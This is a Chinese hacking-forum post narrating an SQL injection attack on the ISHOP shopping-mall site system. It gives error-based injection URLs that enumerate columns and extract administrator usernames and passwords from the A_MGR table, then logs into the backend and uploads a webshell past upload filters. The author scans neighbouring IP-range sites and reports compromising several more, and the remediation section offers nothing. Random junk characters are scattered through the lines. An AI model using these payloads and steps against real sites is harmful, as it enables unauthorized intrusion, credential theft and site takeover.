找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2241|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点
! d; |% I* D7 ~4 ihttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389, Q. h* E3 y& m0 ?7 e; Y6 r7 b0 C
+ C/ Q4 J! C8 g3 A8 g
习惯性的加’having1=1--
, }+ B/ N' C% Q# c2 A1 @
8 L6 q- [) [. @http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
/ W) ~- J) e: e
3 b* a( E  H" L0 u* E$ ?  s0" j/ J" A, K; P

! [! U3 U# l0 Q2 |. @爆出Diary_A.dl_Title(这时候很激动啊); {0 D& e$ k9 j# q. q- i; G

; D8 q  v  V8 E" x8 x8 f那么继续
4 u* H* _& o- I5 D  B: }http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—+ V  S% D5 H- H1 u$ n% h

3 ~& K4 e& U8 b: B! K7 U继续,一直爆下去
: w; s+ G' _: |. O- k3 o# U% b
爆到几个字段和表段 但是没找到需要的管理用户的字段  T% r6 v$ \( U/ z( k1 v
5 U/ j3 r9 I! y: n" b6 j
蛋疼了 怎么办 然后去后台登陆页看源码" t% G, @5 h& l6 t+ x; d

+ G8 V/ _3 x' r: D8 B; U! |) a. u0* A8 [. t* b( \8 A) ^8 P

. S+ i4 a3 s8 Q9 {/ I8 a# fInput name= “ADUID”
: h- b- O7 e3 ~6 F3 i2 E3 nInput name= “ADPWD”
6 |2 l: Y. H' Z: E- r. _' U6 ?, L' U& `4 z8 O2 B# J5 a4 }
很幸运 找到了字段那就继续
  U4 i+ u4 s  |找到之后开始爆用户
/ F; b& o% W! K  T4 C1 `5 nhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
) |. y/ X3 n9 q+ h- t8 ?爆密码" j/ K8 r4 i, |7 c$ k
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
' F6 K5 V/ F! N  _* Y- U$ m1 N. Q" i测试了下 这个注入点只能爆到文章哪里的表 & a* H% w, y8 ]7 p

8 z9 F/ ~* `5 h1 K! o$ ^% _8 y头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了' w( \7 V, L. p. e
, U- t3 V" J: r* X! X: s1 g
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
. u0 F: _% l& a0 E6 ~
; J0 u( c3 ], r2 d6 [9 r* C/ |0 y+ ?473  m2 n1 u, l1 Z0 D
7 A  l* ]& ]7 d( b; x5 D9 F! `
进后台, c0 S% q* [/ ~

" e3 |8 n* u' {) }( B
9 _" {; O+ F' B+ V* }" N% n+ d, K发现几个上传点 有的地方不能上传 而且防止恶意代码, V0 S: ^  L. N# n. x+ `

+ W' v& ~7 O! _( G! h+ i没办法 各种百度各种找大牛 找到一只好像可以突破的马; B" b5 X# T( Z# a# k0 p$ U; V( F
9 s, a7 I0 n: ~9 a0 I7 Z: ~

' Q0 i8 n7 O+ v9 F6 |" L在系统管理那里直接上传 不过没有显示地址: l3 i( }$ D6 L( e4 P, M
5 w- }& ^6 V# Q- O/ B6 A- {, n
再上传一次 抓包 搞定OK
: L3 H; h! e* r: K! h+ o7 A  T6 N1 _9 B. |; ]

' u  w$ ]! ?% k( D4 f+ L
: U/ l6 E8 _0 C9 I8 r472' W6 v2 c% L3 r8 d

2 a7 ]8 ^* X; d2 @; Q晚上不行了 去睡觉。。。4 c3 F8 u% ~, R5 Z
第二天刚起床 闲的没事做继续日站吧 % v" B) }! ]4 _  a) T% H
5 @3 t7 Z0 z: |. x3 Y( y
找个站 就把这个站的旁c扫了下
4 K/ D/ \9 Q$ b1 f4 w" N  o7 t
" ]$ \6 t/ v4 G  {( Z- {发现c段也有一个购物站 ,然后还和这个站的模板差不多) X( |6 r5 l: J) ]

/ u+ d8 f; L( H2 T. ]3 l  [! {就找到会员登录口测试" u) p$ z! H/ c5 `+ l6 Z) T
1 z! M- t1 O# o6 g' h3 ]
'and (select top 1 MGR_UID from A_MGR)>0—# c) J- v$ Y3 s# a+ [3 H( A
果断爆到了 这时候我很激动 通杀
9 F/ R- j4 N' s) w1 q' J' ?" M; X; [) C& c/ J
再次翻c段2 \4 t) I4 r1 ?' d/ G4 C0 v

0 V) G0 ^% F9 R2 s翻出几个站 都成功拿下
9 z8 D5 @& k: z1 [# T& }. m; i0 h4 l. I' h$ b& O  c0 F" s0 e* \
4 a$ [" N9 z1 ~4 f+ m
# b; l% N2 E: B. V! X" o' O
修复方案:
5 [8 G% T6 q/ l他们比我专业
- s4 r8 y6 y0 ]( {/ |8 o0 a: L9 e9 w9 h6 n6 {

" ?3 X$ {6 I$ C
8 ~* N% P5 b9 b( Q5 b& S7 D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表